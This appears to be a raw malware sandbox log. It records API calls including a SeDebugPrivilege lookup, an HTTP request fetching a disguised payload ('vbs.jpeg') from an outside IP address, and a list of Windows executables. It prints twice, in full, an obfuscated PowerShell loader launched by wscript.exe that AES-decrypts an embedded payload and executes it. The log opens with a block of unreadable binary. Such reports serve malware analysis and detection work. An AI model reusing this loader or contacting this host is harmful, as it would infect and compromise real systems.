ڝóA"D&*Uk¶(5-TzZ·e²Çà0 ©”E©DgO8êê)Fµü@âz½:NêÒ*µÍåà]LƏ¥Œ ¶Õ Óùˆ¡V¿,̖hæõROÇñ-Ttè«Iïyåšyã S×½à{-<¨X¡u ß ©›JQYB©â½ý³Å˪Õî#²šà‘W„ƒW®PŒ7:n¾—x”¼À²3+ÁÓ‰Ïm*Wp¡×3“ÄcÕ@T¨B8`xÝC DèÚè+“Ÿ3mþ-×YÒ¢39F`EqÐa”E³Í¬HãžqiõκcGÇK®¸Óé!*)Ë1^—Ó;îñFÌfpXñ·©ã1ô/2ÌÌeeÕwÍq§C¹÷Ì8³€)J xÇ+ÈÆ¢˜jt¤–]Ê9ß-Üü×O|qÇr§#ßsV.:žK¥ÆA°G_Ž7©xÖ1B½Ž'$„ŽäÎdþÏ q#+õäprÐ#n )ÚÉØ÷ç65–0-Ÿo|ó³I¬ièFmOZã\ÞÀ(UØÂÀ걎ù•çë(€ƒÁ®Øp¥œçËÿÀvi”²Ž¥±v”=ÒØ “"5 $Wc‹¨tšG“˜Çá8 %±(÷Ç¡®Ià.yÝh&gŽR©´<Þ-$B›UØ­“}û`hj5 ¢Œ¼´IáW¹9•ŸSãR6¦VÙûØÜüØ5Ú§¦°Tï=.—í/ˆˆöE«R;U•‡M
Data received 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
Data sent GET /Upload/vbs.jpeg HTTP/1.1 Host: 198.46.176.133 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
status: 1 return: 1 repeated: 0
host 198.46.176.133
Time & API Arguments Status Return Repeated

send

buffer: GET /Upload/vbs.jpeg HTTP/1.1 Host: 198.46.176.133 Connection: Keep-Alive
socket: 1312
sent: 79
status: 1 return: 79 repeated: 0
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
parent_process wscript.exe martian_process powershell.exe -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe